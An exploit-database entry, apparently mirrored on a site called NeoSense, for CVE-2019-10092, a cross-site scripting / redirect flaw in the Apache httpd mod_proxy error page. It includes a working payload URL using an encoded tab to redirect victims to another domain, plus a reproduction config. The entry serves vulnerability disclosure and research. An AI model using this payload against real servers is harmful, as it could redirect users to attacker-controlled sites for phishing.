[] NeoSense
E X P L O I T S
title author type platform port cve id

Apache Httpd mod_proxy - Error Page Cross-Site Scripting

Author: Sebastian Neef
type: webapps
platform: multiple
port: 
date_added: 2019-11-19 
date_updated: 2019-11-19 
verified: 0 
codes: CVE-2019-10092 
tags: 
aliases:  
screenshot_url:  
application_url: 
The trick is to use a vertical tab (`%09`) and then place another URL in the tag. So once a victim clicks the link on the error page, she will go somewhere else.

As you can see, the browser changes the destination from relative / to an absolute url https://enoflag.de. The exploit is `http://domain.tld/%09//otherdomain.tld`

Here's the httpd configuration to reproduce the behavior:

```
    <Location />
        ProxyPass http://127.0.0.1:9000/ connectiontimeout=1 timeout=2
        ProxyPassReverse http://127.0.0.1:9000/
        Order allow,deny
        Allow from all
    </Location>
```
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.